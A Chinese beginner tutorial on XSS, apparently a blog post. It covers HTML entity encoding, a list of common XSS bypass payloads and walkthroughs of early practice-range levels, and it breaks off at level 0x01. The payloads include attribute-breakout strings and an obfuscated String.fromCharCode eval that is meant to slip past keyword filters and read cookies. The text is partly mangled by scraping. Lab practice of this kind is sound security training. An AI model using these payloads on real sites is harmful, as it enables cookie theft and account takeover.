-
网安入门18-XSS(靶场实战)
HTML实体化编码
为了避免 XSS 攻击,会将
<>编码为<与>,这些就是 HTML 实体编码。编码前 编码后 不可分的空格 < (小于符号) <> (大于符号) >& (与符号) &″ (双引号) "’ (单引号) '© (版权符号) ©he.encode('') // "<img src=""></img>" // 转义 he.escape('
') // "<img src=""></img>"
- 1
- 2
- 3
- 4
常见的绕过payload
<img src="x" onerror=alert(1)><a href="javascript:alert(1)">baidua> <a href="javascript:aaa" onmouseover="alert(/xss/)">aaa> <script>alert('xss')script> <script>prompt('xss')script> <iframe src="javascript:alert('xss')"><iframe> <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="> <iframe> <iframe src="javascript:prompt(`xss`)">iframe> <svg onload=alert(1)> <input type=“hidden” accesskey=“X” onclick=“alert(1)”> eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111, 111,107,105,101,41)) 适用于绕过黑名单 alert 在跨站中,String.fromCharCode 主要是使到 一些已经被列入黑名单的关键字或语句安全通过检测,把关键字或语句转换成为 ASCII 码, 然后再用 String.fromCharCode 还原,因为大多数的过滤系统都不会把 String.fromCharCode 加以过滤,例如关键字 alert 被过滤掉,那就可以这么利用 alert(document.cookie) <img src="1" onerror=alert(1)> <img src="1" onerror=alert(1)>(实体化() <img src=1 onerror=alert()> <script>\u0061\u006c\u0065\u0072\u0074(1)script>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
靶场实战(一)
Level 1
通过观察页面,猜测因该是一个传参name=test可以下手
查看页面源代码
从这里我们可以看到它将name的参数值,插入到了
payload:name=Level 2
一个搜索框,故技重施失败了,判断他有过滤
查看源代码,上面一行是查询的回显,可以看到被实体化编码了,下面一行被双引号包裹
上面的实体化编码无法绕过了,现在的目标转化为下面一行,那就是闭合!
payload: ">//
或者 "><实测也可以不用注释后面的">,说明HTML属于弱类型,校验不严格,另外查看这关源代码,调用的函数是 htmlspecialchars() 它的作用就是让 < 和 > 被HTML实体化编码
PHP htmlspecialchars() 函数Level 3
还是搜索框,故技重施x2,无果,看源代码
这波看似没办法搞了,两边都被实体化了
仔细一想,两个尖括号以及被ban掉,特殊事件 onmouseover onclick onfocuse 的介绍链接:
HTML onmouseover 事件属性 | 菜鸟教程
HTML onclick 事件属性 | 菜鸟教程
HTML onfocus 事件属性 | 菜鸟教程函数 效果 οnmοuseοver=alert(1) 鼠标指针移至图片之上时弹窗 οnclick=alert(1) 输入域获得焦点时弹窗 οnfοcus=alert(1) 单击鼠标时弹窗 还有一个问题就是闭合这两个引号,闭合前面的,注释或者闭合后面的,这里跟上一关的标签闭合不一样,是比较严格的,不闭合属性中的值会无法执行
payload:' onmouseover=alert(1) //
或者: ' onmouseover=alert(1) x='靶场实战(二)
0x00
啥也没有直接来吧
0x01
前面的
